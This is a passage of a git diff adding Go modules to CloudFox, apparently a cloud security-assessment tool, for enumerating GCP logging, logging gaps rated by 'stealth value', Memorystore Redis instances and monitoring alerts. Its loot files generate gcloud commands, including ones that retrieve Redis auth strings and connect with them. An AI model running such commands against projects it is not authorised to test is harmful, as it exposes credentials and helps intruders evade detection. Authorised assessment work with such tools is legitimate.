getDestinationName(sink), + sink.WriterIdentity, + ) + } +} + +func (m *LoggingModule) addMetricToLoot(metric LoggingService.MetricInfo) { + m.LootMap["metrics-commands"].Contents += fmt.Sprintf( + "# Metric: %s (Project: %s)\n"+ + "gcloud logging metrics describe %s --project=%s\n\n", + metric.Name, metric.ProjectID, + metric.Name, metric.ProjectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *LoggingModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Sinks table + sinksHeader := []string{ + "Project Name", + "Project ID", + "Sink Name", + "Destination Type", + "Destination", + "Cross-Project", + "Disabled", + "Writer Identity", + "Filter", + } + + var sinksBody [][]string + for _, sink := range m.Sinks { + // Format destination + destination := getDestinationName(sink) + + // Format cross-project + crossProject := "No" + if sink.IsCrossProject { + crossProject = fmt.Sprintf("Yes -> %s", sink.DestinationProject) + } + + // Format disabled + disabled := "No" + if sink.Disabled { + disabled = "Yes" + } + + // Format filter (no truncation) + filter := "-" + if sink.Filter != "" { + filter = normalizeFilter(sink.Filter) + } + + // Format writer identity + writerIdentity := "-" + if sink.WriterIdentity != "" { + writerIdentity = sink.WriterIdentity + } + + sinksBody = append(sinksBody, []string{ + m.GetProjectName(sink.ProjectID), + sink.ProjectID, + sink.Name, + sink.DestinationType, + destination, + crossProject, + disabled, + writerIdentity, + filter, + }) + } + + // Metrics table + metricsHeader := []string{ + "Project Name", + "Project ID", + "Metric Name", + "Description", + "Filter", + "Type", + } + + var metricsBody [][]string + for _, metric := range m.Metrics { + // Format filter (no truncation) + filter := "-" + if metric.Filter != "" { + filter = normalizeFilter(metric.Filter) + } + + // Format type + metricType := metric.MetricKind + if metric.ValueType != "" { + 
metricType += "/" + metric.ValueType + } + + // Format description (no truncation) + description := metric.Description + if description == "" { + description = "-" + } + + metricsBody = append(metricsBody, []string{ + m.GetProjectName(metric.ProjectID), + metric.ProjectID, + metric.Name, + description, + filter, + metricType, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{} + + if len(sinksBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_LOGGING_MODULE_NAME + "-sinks", + Header: sinksHeader, + Body: sinksBody, + }) + } + + if len(metricsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_LOGGING_MODULE_NAME + "-metrics", + Header: metricsHeader, + Body: metricsBody, + }) + } + + output := LoggingOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_LOGGING_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// Helper functions + +// getDestinationName returns a human-readable destination name +func getDestinationName(sink LoggingService.SinkInfo) string { + switch sink.DestinationType { + case "storage": + return sink.DestinationBucket + case "bigquery": + return sink.DestinationDataset + case "pubsub": + return sink.DestinationTopic + case "logging": + // Extract bucket name from full path + parts := strings.Split(sink.Destination, "/") + if 
len(parts) > 0 { + return parts[len(parts)-1] + } + return sink.Destination + default: + return sink.Destination + } +} + +// normalizeFilter normalizes a log filter for display (removes newlines but no truncation) +func normalizeFilter(filter string) string { + // Remove newlines + filter = strings.ReplaceAll(filter, "\n", " ") + filter = strings.ReplaceAll(filter, "\t", " ") + + // Collapse multiple spaces + for strings.Contains(filter, " ") { + filter = strings.ReplaceAll(filter, " ", " ") + } + + return strings.TrimSpace(filter) +} diff --git a/gcp/commands/logginggaps.go b/gcp/commands/logginggaps.go new file mode 100644 index 00000000..3aa77b7d --- /dev/null +++ b/gcp/commands/logginggaps.go @@ -0,0 +1,249 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + logginggapsservice "github.com/BishopFox/cloudfox/gcp/services/loggingGapsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPLoggingGapsCommand = &cobra.Command{ + Use: globals.GCP_LOGGINGGAPS_MODULE_NAME, + Aliases: []string{"log-gaps", "stealth", "blind-spots"}, + Short: "Find resources with missing or incomplete logging", + Long: `Identify logging gaps across GCP resources for stealth assessment. + +This module helps identify resources where actions may not be properly logged, +which is valuable for understanding detection blind spots. 
+ +Resources Checked: +- Cloud Storage buckets (access logging) +- VPC subnets (flow logs) +- GKE clusters (workload and system logging) +- Cloud SQL instances (query and connection logging) +- Log sinks and exclusions (export gaps) +- Project-level audit logging configuration + +Output: +- Resources with disabled or partial logging +- Stealth value rating (CRITICAL, HIGH, MEDIUM, LOW) +- Specific missing log types +- Recommendations for defenders +- Commands for testing detection gaps + +Stealth Value Ratings: +- CRITICAL: No logging, actions completely invisible +- HIGH: Significant gaps enabling undetected activity +- MEDIUM: Some logging present but incomplete +- LOW: Minor gaps with limited stealth value`, + Run: runGCPLoggingGapsCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type LoggingGapsModule struct { + gcpinternal.BaseGCPModule + + Gaps []logginggapsservice.LoggingGap + AuditConfigs []*logginggapsservice.AuditLogConfig + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type LoggingGapsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o LoggingGapsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o LoggingGapsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPLoggingGapsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_LOGGINGGAPS_MODULE_NAME) + if err != nil { + return + } + + module := &LoggingGapsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Gaps: []logginggapsservice.LoggingGap{}, + AuditConfigs: []*logginggapsservice.AuditLogConfig{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, 
cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *LoggingGapsModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_LOGGINGGAPS_MODULE_NAME, m.processProject) + + if len(m.Gaps) == 0 { + logger.InfoM("No logging gaps found", globals.GCP_LOGGINGGAPS_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d logging gap(s)", len(m.Gaps)), globals.GCP_LOGGINGGAPS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *LoggingGapsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Scanning logging gaps in project: %s", projectID), globals.GCP_LOGGINGGAPS_MODULE_NAME) + } + + svc := logginggapsservice.New() + gaps, auditConfig, err := svc.EnumerateLoggingGaps(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGGINGGAPS_MODULE_NAME, + fmt.Sprintf("Could not enumerate logging gaps in project %s", projectID)) + return + } + + m.mu.Lock() + m.Gaps = append(m.Gaps, gaps...) 
+ if auditConfig != nil { + m.AuditConfigs = append(m.AuditConfigs, auditConfig) + } + + for _, gap := range gaps { + m.addGapToLoot(gap) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d logging gap(s) in project %s", len(gaps), projectID), globals.GCP_LOGGINGGAPS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *LoggingGapsModule) initializeLootFiles() { + m.LootMap["logging-gaps-commands"] = &internal.LootFile{ + Name: "logging-gaps-commands", + Contents: "# Logging Gaps Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *LoggingGapsModule) addGapToLoot(gap logginggapsservice.LoggingGap) { + m.LootMap["logging-gaps-commands"].Contents += fmt.Sprintf( + "## %s: %s (Project: %s, Location: %s)\n"+ + "# Status: %s\n"+ + "# Missing:\n", + gap.ResourceType, gap.ResourceName, + gap.ProjectID, gap.Location, + gap.LoggingStatus, + ) + for _, missing := range gap.MissingLogs { + m.LootMap["logging-gaps-commands"].Contents += fmt.Sprintf("# - %s\n", missing) + } + m.LootMap["logging-gaps-commands"].Contents += "\n" + + // Add exploit commands + if len(gap.ExploitCommands) > 0 { + for _, cmd := range gap.ExploitCommands { + m.LootMap["logging-gaps-commands"].Contents += cmd + "\n" + } + m.LootMap["logging-gaps-commands"].Contents += "\n" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *LoggingGapsModule) writeOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Project ID", + "Project Name", + "Type", + "Resource", + "Location", + "Status", + "Missing Logs", + } + + var body [][]string + for _, gap := range m.Gaps { + missingLogs := strings.Join(gap.MissingLogs, "; ") + + location := gap.Location + if location == "" { + location = "-" + } + + body = append(body, []string{ + gap.ProjectID, + 
m.GetProjectName(gap.ProjectID), + gap.ResourceType, + gap.ResourceName, + location, + gap.LoggingStatus, + missingLogs, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "logging-gaps", + Header: header, + Body: body, + }, + } + + output := LoggingGapsOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_LOGGINGGAPS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/memorystore.go b/gcp/commands/memorystore.go new file mode 100644 index 00000000..6defdb06 --- /dev/null +++ b/gcp/commands/memorystore.go @@ -0,0 +1,224 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + memorystoreservice "github.com/BishopFox/cloudfox/gcp/services/memorystoreService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPMemorystoreCommand = &cobra.Command{ + Use: globals.GCP_MEMORYSTORE_MODULE_NAME, + Aliases: []string{"redis", "cache"}, + Short: "Enumerate Memorystore (Redis) instances", + Long: `Enumerate Memorystore for Redis instances with security analysis. 
+ +Features: +- Lists all Redis instances +- Shows authentication and encryption status +- Identifies network configuration +- Detects security misconfigurations`, + Run: runGCPMemorystoreCommand, +} + +type MemorystoreModule struct { + gcpinternal.BaseGCPModule + RedisInstances []memorystoreservice.RedisInstanceInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type MemorystoreOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o MemorystoreOutput) TableFiles() []internal.TableFile { return o.Table } +func (o MemorystoreOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPMemorystoreCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_MEMORYSTORE_MODULE_NAME) + if err != nil { + return + } + + module := &MemorystoreModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + RedisInstances: []memorystoreservice.RedisInstanceInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *MemorystoreModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_MEMORYSTORE_MODULE_NAME, m.processProject) + + if len(m.RedisInstances) == 0 { + logger.InfoM("No Memorystore instances found", globals.GCP_MEMORYSTORE_MODULE_NAME) + return + } + + noAuth := 0 + for _, instance := range m.RedisInstances { + if !instance.AuthEnabled { + noAuth++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d Redis instance(s) (%d without auth)", + len(m.RedisInstances), noAuth), globals.GCP_MEMORYSTORE_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *MemorystoreModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Memorystore in project: %s", projectID), 
globals.GCP_MEMORYSTORE_MODULE_NAME) + } + + svc := memorystoreservice.New() + instances, err := svc.ListRedisInstances(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_MEMORYSTORE_MODULE_NAME, + fmt.Sprintf("Could not list Redis instances in project %s", projectID)) + return + } + + m.mu.Lock() + m.RedisInstances = append(m.RedisInstances, instances...) + for _, instance := range instances { + m.addInstanceToLoot(instance) + } + m.mu.Unlock() +} + +func (m *MemorystoreModule) initializeLootFiles() { + m.LootMap["memorystore-commands"] = &internal.LootFile{ + Name: "memorystore-commands", + Contents: "# Memorystore Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *MemorystoreModule) addInstanceToLoot(instance memorystoreservice.RedisInstanceInfo) { + m.LootMap["memorystore-commands"].Contents += fmt.Sprintf( + "## Instance: %s (Project: %s, Location: %s)\n"+ + "# Host: %s:%d\n"+ + "# Auth: %v, Encryption: %s\n\n", + instance.Name, instance.ProjectID, instance.Location, + instance.Host, instance.Port, + instance.AuthEnabled, instance.TransitEncryption, + ) + + // gcloud commands + m.LootMap["memorystore-commands"].Contents += fmt.Sprintf( + "# Describe instance:\n"+ + "gcloud redis instances describe %s --region=%s --project=%s\n\n", + instance.Name, instance.Location, instance.ProjectID, + ) + + // Auth string command (if auth enabled) + if instance.AuthEnabled { + m.LootMap["memorystore-commands"].Contents += fmt.Sprintf( + "# Get auth string:\n"+ + "gcloud redis instances get-auth-string %s --region=%s --project=%s\n\n", + instance.Name, instance.Location, instance.ProjectID, + ) + } + + // Redis CLI connection command + authStr := "" + if instance.AuthEnabled { + authStr = " -a $(gcloud redis instances get-auth-string " + instance.Name + + " --region=" + instance.Location + " --project=" + instance.ProjectID + + " --format='value(authString)')" + 
} + m.LootMap["memorystore-commands"].Contents += fmt.Sprintf( + "# Connect to Redis (from a VM in the same VPC):\n"+ + "redis-cli -h %s -p %d%s\n\n", + instance.Host, instance.Port, authStr, + ) +} + +// extractNetworkName extracts the network name from the full resource path +func extractNetworkName(network string) string { + if network == "" { + return "-" + } + parts := strings.Split(network, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return network +} + +func (m *MemorystoreModule) writeOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "Tier", + "Memory (GB)", + "Version", + "Host:Port", + "Auth Enabled", + "Transit Encryption", + "State", + "Network", + "Connect Mode", + } + + var body [][]string + for _, instance := range m.RedisInstances { + transitEncryption := instance.TransitEncryption + if transitEncryption == "" { + transitEncryption = "DISABLED" + } + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Location, + instance.Tier, + fmt.Sprintf("%d", instance.MemorySizeGB), + instance.RedisVersion, + fmt.Sprintf("%s:%d", instance.Host, instance.Port), + boolToYesNo(instance.AuthEnabled), + transitEncryption, + instance.State, + extractNetworkName(instance.AuthorizedNetwork), + instance.ConnectMode, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{{Name: "memorystore", Header: header, Body: body}} + + output := MemorystoreOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, 
m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_MEMORYSTORE_MODULE_NAME) + } +} diff --git a/gcp/commands/monitoringalerts.go b/gcp/commands/monitoringalerts.go new file mode 100644 index 00000000..22206e00 --- /dev/null +++ b/gcp/commands/monitoringalerts.go @@ -0,0 +1,761 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + monitoring "cloud.google.com/go/monitoring/apiv3/v2" + "cloud.google.com/go/monitoring/apiv3/v2/monitoringpb" + "google.golang.org/api/iterator" +) + +// Module name constant +const GCP_MONITORINGALERTS_MODULE_NAME string = "monitoring-alerts" + +var GCPMonitoringAlertsCommand = &cobra.Command{ + Use: GCP_MONITORINGALERTS_MODULE_NAME, + Aliases: []string{"alerts", "monitoring", "alerting"}, + Hidden: true, + Short: "Enumerate Cloud Monitoring alerting policies and notification channels", + Long: `Analyze Cloud Monitoring alerting policies and notification channels for security gaps. 
+ +Features: +- Lists all alerting policies and their conditions +- Identifies disabled or misconfigured alerts +- Enumerates notification channels and their verification status +- Detects missing critical security alerts +- Identifies uptime check configurations +- Analyzes alert policy coverage gaps + +Required Security Alerts to Check: +- IAM policy changes +- Firewall rule changes +- VPC network changes +- Service account key creation +- Custom role changes +- Audit log configuration changes +- Cloud SQL authorization changes + +Requires appropriate IAM permissions: +- roles/monitoring.viewer +- roles/monitoring.alertPolicyViewer`, + Run: runGCPMonitoringAlertsCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type AlertPolicy struct { + Name string + DisplayName string + ProjectID string + Enabled bool + Combiner string + Documentation string + Conditions []AlertCondition + NotificationChannels []string // Channel resource names +} + +type AlertCondition struct { + Name string + DisplayName string + ResourceType string + MetricType string + Filter string + ThresholdValue float64 + Duration string + Comparison string + Aggregation string +} + +type NotificationChannel struct { + Name string + DisplayName string + ProjectID string + Type string // email, slack, pagerduty, webhook, sms, pubsub + Enabled bool + Verified bool + Labels map[string]string + CreationTime string + MutationTime string +} + +type UptimeCheck struct { + Name string + DisplayName string + ProjectID string + MonitoredHost string + ResourceType string + Protocol string + Port int32 + Path string + Period string + Timeout string + SelectedRegion []string + Enabled bool + SSLEnabled bool +} + + +// ------------------------------ +// Module Struct +// ------------------------------ +type MonitoringAlertsModule struct { + gcpinternal.BaseGCPModule + + AlertPolicies []AlertPolicy + NotificationChannels []NotificationChannel + UptimeChecks 
[]UptimeCheck + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type MonitoringAlertsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o MonitoringAlertsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o MonitoringAlertsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPMonitoringAlertsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_MONITORINGALERTS_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &MonitoringAlertsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + AlertPolicies: []AlertPolicy{}, + NotificationChannels: []NotificationChannel{}, + UptimeChecks: []UptimeCheck{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *MonitoringAlertsModule) Execute(ctx context.Context, logger internal.Logger) { + // Create Monitoring client + alertClient, err := monitoring.NewAlertPolicyClient(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Alert Policy client: %v", err), GCP_MONITORINGALERTS_MODULE_NAME) + return + } + defer alertClient.Close() + + channelClient, err := monitoring.NewNotificationChannelClient(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Notification Channel client: %v", err), GCP_MONITORINGALERTS_MODULE_NAME) + return + } + defer channelClient.Close() + + uptimeClient, err := monitoring.NewUptimeCheckClient(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= 
globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Failed to create Uptime Check client: %v", err), GCP_MONITORINGALERTS_MODULE_NAME) + } + } + if uptimeClient != nil { + defer uptimeClient.Close() + } + + // Process each project + for _, projectID := range m.ProjectIDs { + m.processProject(ctx, projectID, alertClient, channelClient, uptimeClient, logger) + } + + // Check results + if len(m.AlertPolicies) == 0 && len(m.NotificationChannels) == 0 { + logger.InfoM("No monitoring alerts or notification channels found", GCP_MONITORINGALERTS_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d alert policy(ies), %d notification channel(s), %d uptime check(s)", + len(m.AlertPolicies), len(m.NotificationChannels), len(m.UptimeChecks)), GCP_MONITORINGALERTS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *MonitoringAlertsModule) processProject(ctx context.Context, projectID string, alertClient *monitoring.AlertPolicyClient, channelClient *monitoring.NotificationChannelClient, uptimeClient *monitoring.UptimeCheckClient, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating monitoring for project: %s", projectID), GCP_MONITORINGALERTS_MODULE_NAME) + } + + // List alert policies + m.enumerateAlertPolicies(ctx, projectID, alertClient, logger) + + // List notification channels + m.enumerateNotificationChannels(ctx, projectID, channelClient, logger) + + // List uptime checks + if uptimeClient != nil { + m.enumerateUptimeChecks(ctx, projectID, uptimeClient, logger) + } +} + +func (m *MonitoringAlertsModule) enumerateAlertPolicies(ctx context.Context, projectID string, client *monitoring.AlertPolicyClient, logger internal.Logger) { + parent := fmt.Sprintf("projects/%s", projectID) + + req := &monitoringpb.ListAlertPoliciesRequest{ + Name: parent, + } + + it := client.ListAlertPolicies(ctx, 
req) + for { + policy, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_MONITORINGALERTS_MODULE_NAME, + fmt.Sprintf("Could not enumerate alert policies in project %s", projectID)) + break + } + + alertPolicy := AlertPolicy{ + Name: policy.Name, + DisplayName: policy.DisplayName, + ProjectID: projectID, + Enabled: policy.Enabled.GetValue(), + Combiner: policy.Combiner.String(), + NotificationChannels: policy.NotificationChannels, + } + + if policy.Documentation != nil { + alertPolicy.Documentation = policy.Documentation.Content + } + + // Parse conditions + for _, cond := range policy.Conditions { + condition := AlertCondition{ + Name: cond.Name, + DisplayName: cond.DisplayName, + } + + // Parse based on condition type + switch c := cond.Condition.(type) { + case *monitoringpb.AlertPolicy_Condition_ConditionThreshold: + if c.ConditionThreshold != nil { + condition.Filter = c.ConditionThreshold.Filter + condition.Comparison = c.ConditionThreshold.Comparison.String() + condition.ThresholdValue = c.ConditionThreshold.ThresholdValue + + if c.ConditionThreshold.Duration != nil { + condition.Duration = c.ConditionThreshold.Duration.String() + } + + condition.MetricType = m.extractMetricType(c.ConditionThreshold.Filter) + } + case *monitoringpb.AlertPolicy_Condition_ConditionAbsent: + if c.ConditionAbsent != nil { + condition.Filter = c.ConditionAbsent.Filter + condition.MetricType = m.extractMetricType(c.ConditionAbsent.Filter) + } + case *monitoringpb.AlertPolicy_Condition_ConditionMonitoringQueryLanguage: + if c.ConditionMonitoringQueryLanguage != nil { + condition.Filter = c.ConditionMonitoringQueryLanguage.Query + } + } + + alertPolicy.Conditions = append(alertPolicy.Conditions, condition) + } + + m.mu.Lock() + m.AlertPolicies = append(m.AlertPolicies, alertPolicy) + m.mu.Unlock() + } +} + +func (m *MonitoringAlertsModule) enumerateNotificationChannels(ctx 
context.Context, projectID string, client *monitoring.NotificationChannelClient, logger internal.Logger) { + parent := fmt.Sprintf("projects/%s", projectID) + + req := &monitoringpb.ListNotificationChannelsRequest{ + Name: parent, + } + + it := client.ListNotificationChannels(ctx, req) + for { + channel, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_MONITORINGALERTS_MODULE_NAME, + fmt.Sprintf("Could not enumerate notification channels in project %s", projectID)) + break + } + + notifChannel := NotificationChannel{ + Name: channel.Name, + DisplayName: channel.DisplayName, + ProjectID: projectID, + Type: channel.Type, + Enabled: channel.Enabled.GetValue(), + Labels: channel.Labels, + } + + // Check verification status + if channel.VerificationStatus == monitoringpb.NotificationChannel_VERIFIED { + notifChannel.Verified = true + } + + if channel.CreationRecord != nil { + notifChannel.CreationTime = channel.CreationRecord.MutateTime.AsTime().String() + } + + // MutationRecords is a slice - get the most recent one + if len(channel.MutationRecords) > 0 { + lastMutation := channel.MutationRecords[len(channel.MutationRecords)-1] + if lastMutation != nil { + notifChannel.MutationTime = lastMutation.MutateTime.AsTime().String() + } + } + + m.mu.Lock() + m.NotificationChannels = append(m.NotificationChannels, notifChannel) + m.mu.Unlock() + } +} + +func (m *MonitoringAlertsModule) enumerateUptimeChecks(ctx context.Context, projectID string, client *monitoring.UptimeCheckClient, logger internal.Logger) { + parent := fmt.Sprintf("projects/%s", projectID) + + req := &monitoringpb.ListUptimeCheckConfigsRequest{ + Parent: parent, + } + + it := client.ListUptimeCheckConfigs(ctx, req) + for { + check, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_MONITORINGALERTS_MODULE_NAME, + 
fmt.Sprintf("Could not enumerate uptime checks in project %s", projectID)) + break + } + + uptimeCheck := UptimeCheck{ + Name: check.Name, + DisplayName: check.DisplayName, + ProjectID: projectID, + } + + // Parse resource type + switch r := check.Resource.(type) { + case *monitoringpb.UptimeCheckConfig_MonitoredResource: + if r.MonitoredResource != nil { + uptimeCheck.ResourceType = r.MonitoredResource.Type + if host, ok := r.MonitoredResource.Labels["host"]; ok { + uptimeCheck.MonitoredHost = host + } + } + } + + // Parse check request details + switch cr := check.CheckRequestType.(type) { + case *monitoringpb.UptimeCheckConfig_HttpCheck_: + if cr.HttpCheck != nil { + uptimeCheck.Protocol = "HTTP" + uptimeCheck.Port = cr.HttpCheck.Port + uptimeCheck.Path = cr.HttpCheck.Path + if cr.HttpCheck.UseSsl { + uptimeCheck.Protocol = "HTTPS" + uptimeCheck.SSLEnabled = true + } + } + case *monitoringpb.UptimeCheckConfig_TcpCheck_: + if cr.TcpCheck != nil { + uptimeCheck.Protocol = "TCP" + uptimeCheck.Port = cr.TcpCheck.Port + } + } + + if check.Period != nil { + uptimeCheck.Period = check.Period.String() + } + + if check.Timeout != nil { + uptimeCheck.Timeout = check.Timeout.String() + } + + // Check regions + for _, region := range check.SelectedRegions { + uptimeCheck.SelectedRegion = append(uptimeCheck.SelectedRegion, region.String()) + } + + m.mu.Lock() + m.UptimeChecks = append(m.UptimeChecks, uptimeCheck) + m.mu.Unlock() + } +} + + +// ------------------------------ +// Helper Functions +// ------------------------------ +func (m *MonitoringAlertsModule) extractMetricType(filter string) string { + // Extract metric type from filter string + // Format: metric.type="..." or resource.type="..." 
+ if strings.Contains(filter, "metric.type=") { + parts := strings.Split(filter, "metric.type=") + if len(parts) > 1 { + metricPart := strings.Split(parts[1], " ")[0] + return strings.Trim(metricPart, "\"") + } + } + return "" +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *MonitoringAlertsModule) initializeLootFiles() { + m.LootMap["monitoring-alerts-commands"] = &internal.LootFile{ + Name: "monitoring-alerts-commands", + Contents: "# Monitoring Alerts Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Build notification channel name map for resolving channel references + channelNameMap := make(map[string]string) + for _, c := range m.NotificationChannels { + channelNameMap[c.Name] = c.DisplayName + } + + // Sort policies by name + sort.Slice(m.AlertPolicies, func(i, j int) bool { + return m.AlertPolicies[i].DisplayName < m.AlertPolicies[j].DisplayName + }) + + // Alert Policies table - one row per condition + policiesHeader := []string{ + "Project Name", + "Project ID", + "Policy Name", + "Enabled", + "Condition Name", + "Metric Type", + "Comparison", + "Threshold", + "Duration", + "Notification Channels", + } + + var policiesBody [][]string + for _, p := range m.AlertPolicies { + // Resolve notification channel names + var channelNames []string + for _, channelRef := range p.NotificationChannels { + if name, ok := channelNameMap[channelRef]; ok { + channelNames = 